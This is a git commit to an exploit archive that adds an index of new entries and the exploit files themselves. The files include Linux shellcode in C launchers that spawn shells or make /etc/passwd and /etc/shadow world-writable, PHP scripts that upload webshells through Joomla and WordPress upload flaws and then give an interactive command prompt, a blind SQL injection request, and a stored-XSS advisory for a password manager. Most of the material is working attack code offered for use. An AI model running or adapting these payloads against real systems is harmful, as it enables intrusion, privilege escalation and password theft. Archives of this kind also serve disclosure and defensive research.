DB: 2015-06-27
19 new exploits
This commit is contained in:
parent
441db36a16
commit
fcb4d832b3
21 changed files with 1158 additions and 3 deletions
23
files.csv
23
files.csv
|
@ -32335,7 +32335,7 @@ id,file,description,date,author,platform,type,port
|
|||
35867,platforms/php/webapps/35867.txt,"Taha Portal 3.2 'sitemap.php' Cross Site Scripting Vulnerability",2011-06-18,Bl4ck.Viper,php,webapps,0
|
||||
35868,platforms/linux/shellcode/35868.c,"Linux MIPS execve (36 bytes)",2015-01-22,Sanguine,linux,shellcode,0
|
||||
35869,platforms/windows/dos/35869.txt,"Crystal Player 1.99 - Memory Corruption Vulnerability",2015-01-21,"Kapil Soni",windows,dos,0
|
||||
35870,platforms/windows/dos/35870.rb,"Exif Pilot 4.7.2 - SEH Based Buffer Overflow",2015-01-22,"Osanda M. Jayathissa",windows,dos,0
|
||||
35870,platforms/windows/dos/35870.rb,"Exif Pilot 4.7.2 - SEH Based Buffer Overflow",2015-01-22,"Osanda Malith",windows,dos,0
|
||||
35871,platforms/php/webapps/35871.txt,"Sitemagic CMS 2010.04.17 'SMExt' Parameter Cross Site Scripting Vulnerability",2011-06-21,"Gjoko Krstic",php,webapps,0
|
||||
35872,platforms/asp/webapps/35872.txt,"H3C ER5100 Authentication Bypass Vulnerability",2011-06-22,128bit,asp,webapps,0
|
||||
35873,platforms/windows/remote/35873.txt,"Wireshark 1.4.5 'bytes_repr_len()' NULL Pointer Dereference Denial Of Service Vulnerability",2011-06-17,rouli,windows,remote,0
|
||||
|
@ -33718,7 +33718,7 @@ id,file,description,date,author,platform,type,port
|
|||
37362,platforms/lin_x86-64/shellcode/37362.c,"linux/x86-64 execve(/bin/sh) 30 bytes",2015-06-24,"Bill Borskey",lin_x86-64,shellcode,0
|
||||
37363,platforms/php/webapps/37363.txt,"GeniXCMS 0.0.3 - register.php SQL Injection Vulnerabilities",2015-06-24,cfreer,php,webapps,80
|
||||
37364,platforms/php/webapps/37364.txt,"Joomla SimpleImageUpload - Arbitrary File Upload",2015-06-24,CrashBandicot,php,webapps,80
|
||||
37365,platforms/lin_x86/shellcode/37365.c,"Linux/x86 Downloand & Execute",2015-06-24,B3mB4m,lin_x86,shellcode,0
|
||||
37365,platforms/lin_x86/shellcode/37365.c,"Linux/x86 Download & Execute",2015-06-24,B3mB4m,lin_x86,shellcode,0
|
||||
37366,platforms/lin_x86/shellcode/37366.c,"Linux/x86 Reboot - 28 Bytes",2015-06-24,B3mB4m,lin_x86,shellcode,0
|
||||
37367,platforms/windows/local/37367.rb,"Windows ClientCopyImage Win32k Exploit",2015-06-24,metasploit,windows,local,0
|
||||
37368,platforms/multiple/remote/37368.rb,"Adobe Flash Player ShaderJob Buffer Overflow",2015-06-24,metasploit,multiple,remote,0
|
||||
|
@ -33728,3 +33728,22 @@ id,file,description,date,author,platform,type,port
|
|||
37372,platforms/java/webapps/37372.html,"BMC Identity Management Cross Site Request Forgery Vulnerability",2012-06-11,"Travis Lee",java,webapps,0
|
||||
37373,platforms/php/webapps/37373.php,"WordPress Contus Video Gallery Plugin 'upload1.php' Arbitrary File Upload Vulnerability",2012-06-12,"Sammy FORGIT",php,webapps,0
|
||||
37374,platforms/php/webapps/37374.txt,"Joomla! Alphacontent Component 'limitstart' Parameter SQL Injection Vulnerability",2012-06-10,xDarkSton3x,php,webapps,0
|
||||
37375,platforms/php/webapps/37375.php,"Joomla! Joomsport Component SQL Injection and Arbitrary File Upload Vulnerabilities",2012-06-11,KedAns-Dz,php,webapps,0
|
||||
37376,platforms/php/webapps/37376.php,"XOOPS Cube PROJECT FileManager 'xupload.php' Arbitrary File Upload Vulnerability",2012-06-12,KedAns-Dz,php,webapps,0
|
||||
37377,platforms/php/webapps/37377.php,"WordPress HD FLV Player Plugin 'uploadVideo.php' Arbitrary File Upload Vulnerability",2012-06-13,"Sammy FORGIT",php,webapps,0
|
||||
37378,platforms/php/webapps/37378.php,"Joomla! Simple SWFUpload Component 'uploadhandler.php' Arbitrary File Upload Vulnerability",2012-06-12,"Sammy FORGIT",php,webapps,0
|
||||
37379,platforms/php/webapps/37379.php,"Joomla! Art Uploader Component 'upload.php' Arbitrary File Upload Vulnerability",2012-06-12,"Sammy FORGIT",php,webapps,0
|
||||
37380,platforms/php/webapps/37380.php,"Joomla! DentroVideo Component 'upload.php' Arbitrary File Upload Vulnerability",2012-06-12,"Sammy FORGIT",php,webapps,0
|
||||
37381,platforms/php/webapps/37381.html,"Joomla! IDoEditor Component 'image.php' Arbitrary File Upload Vulnerability",2012-06-13,"Sammy FORGIT",php,webapps,0
|
||||
37382,platforms/php/webapps/37382.php,"Joomla! jFancy Component 'script.php' Arbitrary File Upload Vulnerability",2012-06-13,"Sammy FORGIT",php,webapps,0
|
||||
37383,platforms/php/webapps/37383.php,"Joomla! Easy Flash Uploader Component 'helper.php' Arbitrary File Upload Vulnerability",2012-06-12,"Sammy FORGIT",php,webapps,0
|
||||
37384,platforms/lin_x86-64/shellcode/37384.c,"Linux x86 - execve /bin/sh (23 Bytes)",2015-06-26,"Bill Borskey",lin_x86-64,shellcode,0
|
||||
37387,platforms/php/webapps/37387.txt,"Koha <= 3.20.1 - Multiple SQL Injections",2015-06-26,"Raschin Tavakoli, Bernhard Garn, Peter Aufner and Dimitris Simos",php,webapps,0
|
||||
37388,platforms/php/webapps/37388.txt,"Koha <= 3.20.1 - Path Traversal",2015-06-26,"Raschin Tavakoli, Bernhard Garn, Peter Aufner and Dimitris Simos",php,webapps,0
|
||||
37389,platforms/php/webapps/37389.txt,"Koha <= 3.20.1 - Multiple XSS and XSRF Vulnerabilities",2015-06-26,"Raschin Tavakoli, Bernhard Garn, Peter Aufner and Dimitris Simos",php,webapps,0
|
||||
37390,platforms/lin_x86/shellcode/37390.asm,"Linux/x86 - chmod('/etc/passwd'_0777) shellcode (42 bytes)",2015-06-26,"Mohammad Reza Espargham",lin_x86,shellcode,0
|
||||
37391,platforms/lin_x86/shellcode/37391.asm,"Linux/x86 - chmod('/etc/gshadow') shellcode (37 bytes)",2015-06-26,"Mohammad Reza Espargham",lin_x86,shellcode,0
|
||||
37392,platforms/lin_x86/shellcode/37392.asm,"Linux/x86 chmod('/etc/shadow'_'0777') shellcode (42 bytes)",2015-06-26,"Mohammad Reza Espargham",lin_x86,shellcode,0
|
||||
37393,platforms/lin_x86/shellcode/37393.asm,"Linux/x86 - exec('/bin/dash') shellcode (45 bytes)",2015-06-26,"Mohammad Reza Espargham",lin_x86,shellcode,0
|
||||
37394,platforms/multiple/webapps/37394.txt,"Thycotic Secret Server 8.8.000004 - Stored XSS",2015-06-26,"Marco Delai",multiple,webapps,0
|
||||
37395,platforms/windows/webapps/37395.txt,"ManageEngine Asset Explorer 6.1 - Stored XSS",2015-06-26,"Suraj Krishnaswami",windows,webapps,0
|
||||
|
|
Can't render this file because it is too large.
|
28
platforms/lin_x86-64/shellcode/37384.c
Executable file
28
platforms/lin_x86-64/shellcode/37384.c
Executable file
|
@ -0,0 +1,28 @@
|
|||
/*
|
||||
Compile with: gcc -fno-stack-protector -z execstack
|
||||
23 byte execve shellcode
|
||||
2 ; int execve(const char *filename, char *const argv[], char *const envp[]);
|
||||
3 BITS 64
|
||||
4
|
||||
5 section .text
|
||||
6 global start
|
||||
7
|
||||
8 start:
|
||||
9 xor rdx, rdx ;zero out rdx
|
||||
10 push rdx ;push rdx to stack to null terminate /bin//sh
|
||||
11 mov al, 0x3b ;move 3b into al for execve
|
||||
12 mov rcx, 0x68732f2f6e69622f ;move the immediate value /bin//sh in hex in rcx
|
||||
13 push rcx ;push the immediate value stored in rcx onto the stack
|
||||
14 lea rdi, [rsp] ;load the address of the string that is on the stack into rsi
|
||||
15 syscall ;make the syscall
|
||||
*/
|
||||
|
||||
char shellcode[] = "\x48\x31\xd2\x52\xb0\x3b\x48\xb9\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x51\x48\x8d\x3c\x24\x0f\x05";
|
||||
|
||||
int main(int argc, char **argv)
|
||||
{
|
||||
int (*func)();
|
||||
func = (int (*)()) shellcode;
|
||||
(int)(*func)();
|
||||
return 0;
|
||||
}
|
|
@ -1,4 +1,4 @@
|
|||
Linux/x86 Downloand&Execute
|
||||
Linux/x86 Download&Execute
|
||||
|
||||
|
||||
------WE ARE BOMBERMANS----
|
||||
|
|
40
platforms/lin_x86/shellcode/37390.asm
Executable file
40
platforms/lin_x86/shellcode/37390.asm
Executable file
|
@ -0,0 +1,40 @@
|
|||
/*
|
||||
# Title: Linux/x86 chmod('/etc/passwd',0777) - shellcode 42 bytes
|
||||
# Platform: linux/x86_64
|
||||
# Author: Mohammad Reza Espargham
|
||||
# Linkedin : https://ir.linkedin.com/in/rezasp
|
||||
# E-Mail : me[at]reza[dot]es , reza.espargham[at]gmail[dot]com
|
||||
# Website : www.reza.es
|
||||
# Twitter : https://twitter.com/rezesp
|
||||
# FaceBook : https://www.facebook.com/mohammadreza.espargham
|
||||
|
||||
|
||||
Disassembly of section .text:
|
||||
|
||||
|
||||
00000000 <.text>:
|
||||
0: 6a 0f push $0xf
|
||||
2: 58 pop %eax
|
||||
3: 68 90 90 ff 01 push $0x1ff9090
|
||||
8: 59 pop %ecx
|
||||
9: c1 e9 10 shr $0x10,%ecx
|
||||
c: 68 90 73 77 64 push $0x64777390
|
||||
11: 5b pop %ebx
|
||||
12: c1 eb 08 shr $0x8,%ebx
|
||||
15: 53 push %ebx
|
||||
16: 68 2f 70 61 73 push $0x7361702f
|
||||
1b: 68 2f 65 74 63 push $0x6374652f
|
||||
20: 89 e3 mov %esp,%ebx
|
||||
22: cd 80 int $0x80
|
||||
24: b0 01 mov $0x1,%al
|
||||
26: b3 01 mov $0x1,%bl
|
||||
28: cd 80 int $0x80
|
||||
*/
|
||||
|
||||
#include <stdio.h>
|
||||
#include <string.h>
|
||||
int main(){
|
||||
unsigned char shellcode[]= "\x6a\x0f\x58\x68\x90\x90\xff\x01\x59\xc1\xe9\x10\x68\x90\x73\x77\x64\x5b\xc1\xeb\x08\x53\x68\x2f\x70\x61\x73\x68\x2f\x65\x74\x63\x89\xe3\xcd\x80\xb0\x01\xb3\x01\xcd\x80";
|
||||
fprintf(stdout,"Length: %d\n\n",strlen(shellcode));
|
||||
(*(void(*)()) shellcode)();
|
||||
}
|
36
platforms/lin_x86/shellcode/37391.asm
Executable file
36
platforms/lin_x86/shellcode/37391.asm
Executable file
|
@ -0,0 +1,36 @@
|
|||
/*
|
||||
# Title: Linux/x86 chmod('/etc/gshadow') - shellcode 37 bytes
|
||||
# Platform: linux/x86_64
|
||||
# Author: Mohammad Reza Espargham
|
||||
# Linkedin : https://ir.linkedin.com/in/rezasp
|
||||
# E-Mail : me[at]reza[dot]es , reza.espargham[at]gmail[dot]com
|
||||
# Website : www.reza.es
|
||||
# Twitter : https://twitter.com/rezesp
|
||||
# FaceBook : https://www.facebook.com/mohammadreza.espargham
|
||||
|
||||
|
||||
Disassembly of section .text:
|
||||
|
||||
00000000 <.text>:
|
||||
0: 6a 0f push $0xf
|
||||
2: 58 pop %eax
|
||||
3: 68 90 90 ff 01 push $0x1ff9090
|
||||
8: 59 pop %ecx
|
||||
9: c1 e9 10 shr $0x10,%ecx
|
||||
c: 68 61 64 6f 77 push $0x776f6461
|
||||
11: 68 2f 67 73 68 push $0x6873672f
|
||||
16: 68 2f 65 74 63 push $0x6374652f
|
||||
1b: 89 e3 mov %esp,%ebx
|
||||
1d: cd 80 int $0x80
|
||||
1f: b0 01 mov $0x1,%al
|
||||
21: b3 01 mov $0x1,%bl
|
||||
23: cd 80 int $0x80
|
||||
*/
|
||||
|
||||
#include <stdio.h>
|
||||
#include <string.h>
|
||||
int main(){
|
||||
unsigned char shellcode[]= "\x6a\x0f\x58\x68\x90\x90\xff\x01\x59\xc1\xe9\x10\x68\x61\x64\x6f\x77\x68\x2f\x67\x73\x68\x68\x2f\x65\x74\x63\x89\xe3\xcd\x80\xb0\x01\xb3\x01\xcd\x80";
|
||||
fprintf(stdout,"Length: %d\n\n",strlen(shellcode));
|
||||
(*(void(*)()) shellcode)();
|
||||
}
|
39
platforms/lin_x86/shellcode/37392.asm
Executable file
39
platforms/lin_x86/shellcode/37392.asm
Executable file
|
@ -0,0 +1,39 @@
|
|||
/*
|
||||
# Title: Linux/x86 chmod('/etc/shadow','0777') - shellcode 42 bytes
|
||||
# Platform: linux/x86_64
|
||||
# Date: 2015-06-15
|
||||
# Author: Mohammad Reza Espargham
|
||||
# Linkedin : https://ir.linkedin.com/in/rezasp
|
||||
# E-Mail : me[at]reza[dot]es , reza.espargham[at]gmail[dot]com
|
||||
# Website : www.reza.es
|
||||
# Twitter : https://twitter.com/rezesp
|
||||
# FaceBook : https://www.facebook.com/mohammadreza.espargham
|
||||
|
||||
|
||||
00000000 <.text>:
|
||||
0: 6a 0f push $0xf
|
||||
2: 58 pop %eax
|
||||
3: 68 90 90 ff 01 push $0x1ff9090
|
||||
8: 59 pop %ecx
|
||||
9: c1 e9 10 shr $0x10,%ecx
|
||||
c: 68 90 64 6f 77 push $0x776f6490
|
||||
11: 5b pop %ebx
|
||||
12: c1 eb 08 shr $0x8,%ebx
|
||||
15: 53 push %ebx
|
||||
16: 68 2f 73 68 61 push $0x6168732f
|
||||
1b: 68 2f 65 74 63 push $0x6374652f
|
||||
20: 89 e3 mov %esp,%ebx
|
||||
22: cd 80 int $0x80
|
||||
24: b0 01 mov $0x1,%al
|
||||
26: b3 01 mov $0x1,%bl
|
||||
28: cd 80 int $0x80
|
||||
|
||||
*/
|
||||
|
||||
#include <stdio.h>
|
||||
#include <string.h>
|
||||
int main(){
|
||||
unsigned char shellcode[]= "\x6a\x0f\x58\x68\x90\x90\xff\x01\x59\xc1\xe9\x10\x68\x90\x64\x6f\x77\x5b\xc1\xeb\x08\x53\x68\x2f\x73\x68\x61\x68\x2f\x65\x74\x63\x89\xe3\xcd\x80\xb0\x01\xb3\x01\xcd\x80";
|
||||
fprintf(stdout,"Length: %d\n\n",strlen(shellcode));
|
||||
(*(void(*)()) shellcode)();
|
||||
}
|
42
platforms/lin_x86/shellcode/37393.asm
Executable file
42
platforms/lin_x86/shellcode/37393.asm
Executable file
|
@ -0,0 +1,42 @@
|
|||
/*
|
||||
# Title: Linux/x86 exec('/bin/dash') - shellcode 45 bytes
|
||||
# Platform: linux/x86_64
|
||||
# Date: 2015-06-15
|
||||
# Author: Mohammad Reza Espargham
|
||||
# Linkedin : https://ir.linkedin.com/in/rezasp
|
||||
# E-Mail : me[at]reza[dot]es , reza.espargham[at]gmail[dot]com
|
||||
# Website : www.reza.es
|
||||
# Twitter : https://twitter.com/rezesp
|
||||
# FaceBook : https://www.facebook.com/mohammadreza.espargham
|
||||
|
||||
|
||||
Disassembly of section .text:
|
||||
|
||||
00000000 <.text>:
|
||||
0: b0 46 mov $0x46,%al
|
||||
2: 31 db xor %ebx,%ebx
|
||||
4: 31 c9 xor %ecx,%ecx
|
||||
6: cd 80 int $0x80
|
||||
8: 68 90 90 90 68 push $0x68909090
|
||||
d: 58 pop %eax
|
||||
e: c1 e8 10 shr $0x10,%eax
|
||||
11: c1 e8 08 shr $0x8,%eax
|
||||
14: 50 push %eax
|
||||
15: 68 2f 64 61 73 push $0x7361642f
|
||||
1a: 68 2f 62 69 6e push $0x6e69622f
|
||||
1f: 89 e3 mov %esp,%ebx
|
||||
21: 31 c0 xor %eax,%eax
|
||||
23: b0 0b mov $0xb,%al
|
||||
25: cd 80 int $0x80
|
||||
27: b0 01 mov $0x1,%al
|
||||
29: b3 01 mov $0x1,%bl
|
||||
2b: cd 80 int $0x80
|
||||
*/
|
||||
|
||||
#include <stdio.h>
|
||||
#include <string.h>
|
||||
int main(){
|
||||
unsigned char shellcode[]= "\xb0\x46\x31\xdb\x31\xc9\xcd\x80\x68\x90\x90\x90\x68\x58\xc1\xe8\x10\xc1\xe8\x08\x50\x68\x2f\x64\x61\x73\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc0\xb0\x0b\xcd\x80\xb0\x01\xb3\x01\xcd\x80";
|
||||
fprintf(stdout,"Length: %d\n\n",strlen(shellcode));
|
||||
(*(void(*)()) shellcode)();
|
||||
}
|
97
platforms/multiple/webapps/37394.txt
Executable file
97
platforms/multiple/webapps/37394.txt
Executable file
|
@ -0,0 +1,97 @@
|
|||
#############################################################
|
||||
#
|
||||
# COMPASS SECURITY ADVISORY
|
||||
# http://www.csnc.ch/en/downloads/advisories.html
|
||||
#
|
||||
#############################################################
|
||||
#
|
||||
# CVE ID : CVE-2015-3443
|
||||
# Product: Secret Server [1]
|
||||
# Vendor: Thycotic
|
||||
# Subject: Stored Cross-Site Scripting Vulnerability (XSS)
|
||||
# Risk: High
|
||||
# Effect: Remotely exploitable
|
||||
# Author: Marco Delai (marco.delai@csnc.ch)
|
||||
# Date: June 24th 2015
|
||||
#
|
||||
#############################################################
|
||||
|
||||
|
||||
Introduction:
|
||||
-------------
|
||||
Thycotic Secret Server enterprise password management software allows
|
||||
the creation, management and control of critical passwords in one
|
||||
centralized, web-based repository [1].
|
||||
|
||||
The identified vulnerability (stored Cross-Site Scripting) allows the
|
||||
execution of JavaScript code in the browser of a valid user when it
|
||||
toggle the password mask on a specially crafted password. This allows,
|
||||
for example, an attacker to prepare a specially crafted shared password,
|
||||
which when read by another user, can steal all other passwords the
|
||||
victim has access to.
|
||||
|
||||
|
||||
Vulnerable:
|
||||
-----------
|
||||
Secret Server customers on version 8.6.000000 to 8.8.000004 [2].
|
||||
|
||||
|
||||
Technical Details
|
||||
--------------------
|
||||
Exploiting the vulnerability simply requires to:
|
||||
1. Create a new password entry within Secret Server with the following
|
||||
value: "Compass Security<script>alert("Compass Security")</script>"
|
||||
2. Open the basic dashboard and toggle the password mask. The password
|
||||
is retrieved from the server using an AJAX call and its value is
|
||||
added straight to the page's DOM without validation. Thus, the
|
||||
script included in step 1 is executed.
|
||||
|
||||
Note that the payload defined in step 1 did only get executed in the
|
||||
basic dashboard view. The advanced dashboard did adequately encode the
|
||||
password. Extract of the vulnerable page:
|
||||
|
||||
GET
|
||||
/SecretServer/api.ashx/simplehome/GetSecretItemValue?secretItemId=[...]&audi
|
||||
tAction=unmask HTTP/1.1
|
||||
|
||||
HTTP/1.1 200 OK
|
||||
Cache-Control: no-cache, no-store, must-revalidate
|
||||
Pragma: no-cache
|
||||
Content-Length: 62
|
||||
Content-Type: application/json; charset=utf-8
|
||||
Expires: -1
|
||||
[...]
|
||||
Content-Security-Policy: connect-src 'self'; font-src 'self';
|
||||
frame-src 'self' sslauncher:; img-src 'self' data:; media-src 'self';
|
||||
object-src 'self'; style-src 'self' 'unsafe-inline'; script-src 'self'
|
||||
'unsafe-inline' 'unsafe-eval'
|
||||
X-Content-Security-Policy: connect-src 'self'; font-src 'self';
|
||||
frame-src 'self' sslauncher:; img-src 'self' data:; media-src 'self';
|
||||
object-src 'self'; style-src 'self' 'unsafe-inline'; script-src 'self'
|
||||
'unsafe-inline' 'unsafe-eval'
|
||||
X-Content-Type-Options: nosniff
|
||||
X-XSS-Protection: 1; mode=block
|
||||
X-UA-Compatible: IE=edge
|
||||
|
||||
"Compass Security<script>alert(\"Compass Security\")</script>"
|
||||
|
||||
|
||||
Remediation:
|
||||
------------
|
||||
Update Secret Server to the latest version, which fixes the
|
||||
vulnerability [2].
|
||||
|
||||
|
||||
Milestones:
|
||||
-----------
|
||||
2015-02-19 Vulnerability discovered
|
||||
2015-02-20 Vulnerability reported to vendor
|
||||
2015-02-20 Vendor patch [2]
|
||||
2015-06-24 Public disclosure
|
||||
|
||||
|
||||
References:
|
||||
-----------
|
||||
[1] http://thycotic.com/products/secret-server/
|
||||
[2]
|
||||
http://thycotic.com/products/secret-server/resources/advisories/thy-ss-004/
|
80
platforms/php/webapps/37375.php
Executable file
80
platforms/php/webapps/37375.php
Executable file
|
@ -0,0 +1,80 @@
|
|||
source: http://www.securityfocus.com/bid/53944/info
|
||||
|
||||
The Joomsport component for Joomla! is prone to an SQL-injection vulnerability and an arbitrary file-upload vulnerability because it fails to sanitize user-supplied data.
|
||||
|
||||
Exploiting these issues could allow an attacker to compromise the application, execute arbitrary code, access or modify data, or exploit latent vulnerabilities in the underlying database.
|
||||
|
||||
<?php
|
||||
|
||||
error_reporting(0);
|
||||
set_time_limit(0);
|
||||
ini_set("default_socket_timeout", 5);
|
||||
function http_send($host, $packet)
|
||||
{
|
||||
$sock = fsockopen($host, 80);
|
||||
while (!$sock)
|
||||
{
|
||||
print "\n[-] No response from {$host}:80 Trying again...";
|
||||
$sock = fsockopen($host, 80);
|
||||
}
|
||||
fputs($sock, $packet);
|
||||
while (!feof($sock)) $resp .= fread($sock, 1024);
|
||||
fclose($sock);
|
||||
return $resp;
|
||||
}
|
||||
print "\n|===============================================|";
|
||||
print "\n| Joomla (com_joomsport) Arbitrary Shell Upload |";
|
||||
print "\n| Provided By KedAns-Dz <ked-h[at]hotmail[.]com>|";
|
||||
print "\n|===============================================|\n";
|
||||
if ($argc < 2)
|
||||
{
|
||||
print "\nUsage : php $argv[0] [host] [path]";
|
||||
print "\nExample : php $argv[0] www.p0c.tld /wp/\n";
|
||||
die();
|
||||
}
|
||||
$host = $argv[1];
|
||||
$path = $argv[2];
|
||||
$data = "Content-Disposition: form-data; name=\"Filename\"; filename=\"k3d.php.png\"\r\n";
|
||||
$data .= "Content-Type: application/octet-stream\r\n\r\n";
|
||||
$packet = "POST {$path}components/com_joomsport/includes/imgres.php HTTP/1.0\r\n";
|
||||
$packet .= "Host: {$host}\r\n";
|
||||
$packet .= "Content-Length: ".strlen($data)."\r\n";
|
||||
$packet .= "Content-Type: image/png\r\n";
|
||||
$packet .= "Connection: close\r\n\r\n";
|
||||
$packet .= $data;
|
||||
preg_match("/OnUploadCompleted\((.*),\"(.*)\",\"(.*)\",/i", http_send($host, $packet), $html);
|
||||
if (!in_array(intval($html[1]), array(0, 201))) die("\n[-] Upload failed! (Error {$html[1]})\n");
|
||||
else print "\n[-] Shell uploaded to {$html[2]}...starting it!\n";
|
||||
define(STDIN, fopen("php://stdin", "r"));
|
||||
while(1)
|
||||
{
|
||||
print "\n Inj3ct0rK3d-Sh3lL#";
|
||||
$cmd = trim(fgets(STDIN)); # f.ex : C:\\k3d.php.png
|
||||
if ($cmd != "exit")
|
||||
{
|
||||
$packet = "GET {$path}k3d.php.png{$html[3]} HTTP/1.0\r\n";
|
||||
$packet.= "Host: {$host}\r\n";
|
||||
$packet.= "Connection: close\r\n\r\n";
|
||||
$output = http_send($host, $packet);
|
||||
}
|
||||
else break;
|
||||
}
|
||||
?>
|
||||
|
||||
Access Shell : http://www.example.com/components/com_joomsport/images/k3d.php.png
|
||||
|
||||
#### Exploit (2) Blind SQL Injection =>
|
||||
|
||||
<?php
|
||||
|
||||
$bs =
|
||||
curl_init("http://www.example.com/components/com_joomsport/includes/func.php");
|
||||
curl_setopt($bs, CURLOPT_POST, true);
|
||||
curl_setopt($bs, CURLOPT_POSTFIELDS,
|
||||
array('query'=>"SELECT * FROM jos_users"));
|
||||
curl_setopt($bs, CURLOPT_RETURNTRANSFER, 1);
|
||||
$postResult = curl_exec($bs);
|
||||
curl_close($bs);
|
||||
print "$postResult";
|
||||
|
||||
?>
|
22
platforms/php/webapps/37376.php
Executable file
22
platforms/php/webapps/37376.php
Executable file
|
@ -0,0 +1,22 @@
|
|||
source: http://www.securityfocus.com/bid/53945/info
|
||||
|
||||
FileManager is prone to a vulnerability that lets attackers upload arbitrary files. The issue occurs because the application fails to adequately sanitize user-supplied input.
|
||||
|
||||
An attacker may leverage this issue to upload arbitrary files to the affected computer; this can result in arbitrary code execution within the context of the vulnerable application.
|
||||
|
||||
nj3ct0rK3d-Sh3lL#";
|
||||
$uploadfile = trim(fgets(STDIN)); # f.ex : C:\\k3d.php
|
||||
if ($uploadfile != "exit")
|
||||
{
|
||||
$ch = curl_init("http://www.example.com/modules/fileManager/xupload.php");
|
||||
curl_setopt($ch, CURLOPT_POST, true);
|
||||
curl_setopt($ch, CURLOPT_POSTFIELDS,
|
||||
array('Filedata'=>"@$uploadfile",
|
||||
'path'=>'img'));
|
||||
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
|
||||
$postResult = curl_exec($ch);
|
||||
curl_close($ch);
|
||||
print "$postResult";
|
||||
}
|
||||
else break;
|
||||
?>
|
35
platforms/php/webapps/37377.php
Executable file
35
platforms/php/webapps/37377.php
Executable file
|
@ -0,0 +1,35 @@
|
|||
source: http://www.securityfocus.com/bid/53967/info
|
||||
|
||||
HD FLV Player plugin for WordPress is prone to a vulnerability that lets attackers upload arbitrary files. The issue occurs because the application fails to adequately sanitize user-supplied input.
|
||||
|
||||
An attacker can exploit this vulnerability to upload arbitrary code and run it in the context of the web server process. This may facilitate unauthorized access or privilege escalation; other attacks are also possible.
|
||||
|
||||
HD FLV Player 1.7 is vulnerable; other versions may also be affected.
|
||||
|
||||
Exploit :
|
||||
|
||||
PostShell.php
|
||||
<?php
|
||||
|
||||
$uploadfile="lo.php.jpg";
|
||||
$ch =
|
||||
curl_init("http://www.example.com/wordpress/wp-content/plugins/contus-hd-flv-player/uploadVideo.php");
|
||||
curl_setopt($ch, CURLOPT_POST, true);
|
||||
curl_setopt($ch, CURLOPT_POSTFIELDS,
|
||||
array('myfile'=>"@$uploadfile",
|
||||
'mode'=>'image'));
|
||||
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
|
||||
$postResult = curl_exec($ch);
|
||||
curl_close($ch);
|
||||
print "$postResult";
|
||||
|
||||
?>
|
||||
|
||||
Shell Access :
|
||||
http://www.example.com/wordpress/wp-content/uploads/18_lo.php.jpg
|
||||
Filename : [CTRL-u] PostShell.php after executed
|
||||
|
||||
lo.php.jpg
|
||||
<?php
|
||||
phpinfo();
|
||||
?>
|
30
platforms/php/webapps/37378.php
Executable file
30
platforms/php/webapps/37378.php
Executable file
|
@ -0,0 +1,30 @@
|
|||
source: http://www.securityfocus.com/bid/53968/info
|
||||
|
||||
The Simple SWFUpload component for Joomla! is prone to a vulnerability that lets attackers upload arbitrary files because the application fails to adequately sanitize user-supplied input.
|
||||
|
||||
An attacker can exploit this vulnerability to upload arbitrary code and run it in the context of the web server process. This may facilitate unauthorized access or privilege escalation; other attacks are also possible.
|
||||
|
||||
Simple SWFUpload 2.0 is vulnerable;other versions may also be affected.
|
||||
|
||||
<?php
|
||||
|
||||
$uploadfile="lo.php.gif";
|
||||
|
||||
$ch =
|
||||
curl_init("http://www.exemple.com/administrator/components/com_simpleswfupload/uploadhandler.php");
|
||||
curl_setopt($ch, CURLOPT_POST, true);
|
||||
curl_setopt($ch, CURLOPT_POSTFIELDS,
|
||||
array('Filedata'=>"@$uploadfile"));
|
||||
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
|
||||
$postResult = curl_exec($ch);
|
||||
curl_close($ch);
|
||||
print "$postResult";
|
||||
|
||||
?>
|
||||
|
||||
Shell Access : http://www.exemple.com/images/stories/lo.php.gif
|
||||
|
||||
lo.php.gif
|
||||
<?php
|
||||
phpinfo();
|
||||
?>
|
30
platforms/php/webapps/37379.php
Executable file
30
platforms/php/webapps/37379.php
Executable file
|
@ -0,0 +1,30 @@
|
|||
source: http://www.securityfocus.com/bid/53969/info
|
||||
|
||||
The Art Uploader component for Joomla! is prone to a vulnerability that lets attackers upload arbitrary files because the application fails to adequately sanitize user-supplied input.
|
||||
|
||||
An attacker can exploit this vulnerability to upload arbitrary code and run it in the context of the web server process. This may facilitate unauthorized access or privilege escalation; other attacks are also possible.
|
||||
|
||||
Art Uploader 1.0.1 is vulnerable; other versions may also be affected.
|
||||
|
||||
<?php
|
||||
|
||||
$uploadfile="lo.php";
|
||||
$ch =
|
||||
curl_init("http://www.example.com/modules/mod_artuploader/upload.php");
|
||||
curl_setopt($ch, CURLOPT_POST, true);
|
||||
curl_setopt($ch, CURLOPT_POSTFIELDS,
|
||||
array('userfile'=>"@$uploadfile",
|
||||
'path'=>'./'));
|
||||
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
|
||||
$postResult = curl_exec($ch);
|
||||
curl_close($ch);
|
||||
print "$postResult";
|
||||
|
||||
?>
|
||||
|
||||
Shell Access : http://www.example.com/modules/mod_artuploader/lo.php
|
||||
|
||||
lo.php
|
||||
<?php
|
||||
phpinfo();
|
||||
?>
|
65
platforms/php/webapps/37380.php
Executable file
65
platforms/php/webapps/37380.php
Executable file
|
@ -0,0 +1,65 @@
|
|||
source: http://www.securityfocus.com/bid/53972/info
|
||||
|
||||
The DentroVideo component for Joomla! is prone to a vulnerability that lets attackers upload arbitrary files. The issue occurs because the application fails to adequately sanitize user-supplied input.
|
||||
|
||||
An attacker can exploit this vulnerability to upload arbitrary code and run it in the context of the web server process. This may facilitate unauthorized access or privilege escalation; other attacks are also possible.
|
||||
|
||||
DentroVideo 1.2 is vulnerable; other versions may also be affected.
|
||||
|
||||
Exploit 1 :
|
||||
|
||||
PostShell.php
|
||||
|
||||
<?php
|
||||
|
||||
$uploadfile="lo.php";
|
||||
|
||||
$ch =
|
||||
curl_init("http://www.example.com/components/com_dv/externals/phpupload/upload.php");
|
||||
curl_setopt($ch, CURLOPT_POST, true);
|
||||
curl_setopt($ch, CURLOPT_POSTFIELDS,
|
||||
array('file1'=>"@$uploadfile",
|
||||
'action'=>'upload'));
|
||||
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
|
||||
$postResult = curl_exec($ch);
|
||||
curl_close($ch);
|
||||
|
||||
print "$postResult";
|
||||
|
||||
?>
|
||||
|
||||
Shell Access : http://www.example.com/lo.php
|
||||
|
||||
lo.php
|
||||
<?php
|
||||
phpinfo();
|
||||
?>
|
||||
|
||||
|
||||
Exploit 2 :
|
